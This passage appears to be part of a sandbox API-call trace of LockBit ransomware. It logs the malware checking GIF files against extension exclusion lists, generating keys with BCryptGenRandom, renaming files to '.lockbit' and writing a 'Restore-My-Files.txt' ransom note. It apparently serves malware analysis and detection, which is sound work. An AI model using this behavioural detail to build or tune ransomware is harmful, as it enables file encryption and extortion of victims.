"c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.897] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9359300, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9359300, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x31f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01744_.GIF", cAlternateFileName="")) returned 1 [0180.898] lstrcmpiW (lpString1=".", lpString2="WB01744_.GIF") returned -1 [0180.898] lstrcmpiW (lpString1="..", lpString2="WB01744_.GIF") returned -1 [0180.898] PathFindExtensionW (pszPath="WB01744_.GIF") returned=".GIF" [0180.898] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.898] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.898] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.899] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.899] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.899] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.899] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.899] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.899] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="ntldr", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01744_.GIF") returned -1 [0180.900] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01744_.GIF") returned -1 [0180.900] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.900] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF") returned=".GIF" [0180.900] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.900] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.900] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.901] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.901] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.901] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.901] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.901] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.901] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.901] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF.lockbit") returned 72 [0180.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01744_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.903] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.903] malloc (_Size=0x40068) returned 0x3df0008 [0180.903] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=799) returned 1 [0180.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.904] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.909] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.910] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.911] free (_Block=0x1fa2ed8) [0180.911] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.911] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.911] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43119400, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x43119400, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01745_.GIF", cAlternateFileName="")) returned 1 [0180.911] lstrcmpiW (lpString1=".", lpString2="WB01745_.GIF") returned -1 [0180.911] lstrcmpiW (lpString1="..", lpString2="WB01745_.GIF") returned -1 [0180.912] PathFindExtensionW (pszPath="WB01745_.GIF") returned=".GIF" [0180.912] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.912] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.912] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.913] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.913] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.913] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.913] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.913] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.913] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.914] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.914] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.914] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="ntldr", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01745_.GIF") returned -1 [0180.914] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01745_.GIF") returned -1 [0180.914] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.914] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF") returned=".GIF" [0180.914] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.914] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.914] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.914] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.915] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.915] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.915] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.915] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.915] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.915] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF.lockbit") returned 72 [0180.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01745_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.917] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.917] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.917] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1452) returned 1 [0180.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.918] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.923] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.924] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.925] free (_Block=0x1fa2ed8) [0180.925] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.925] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.926] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab95900, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3ab95900, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01746_.GIF", cAlternateFileName="")) returned 1 [0180.926] lstrcmpiW (lpString1=".", lpString2="WB01746_.GIF") returned -1 [0180.926] lstrcmpiW (lpString1="..", lpString2="WB01746_.GIF") returned -1 [0180.926] PathFindExtensionW (pszPath="WB01746_.GIF") returned=".GIF" [0180.926] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.926] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.926] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.927] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.927] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.927] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.927] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.927] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.927] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.928] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="ntldr", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01746_.GIF") returned -1 [0180.928] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01746_.GIF") returned -1 [0180.928] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.928] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF") returned=".GIF" [0180.928] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.928] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.928] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.928] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.928] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.928] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".frm", 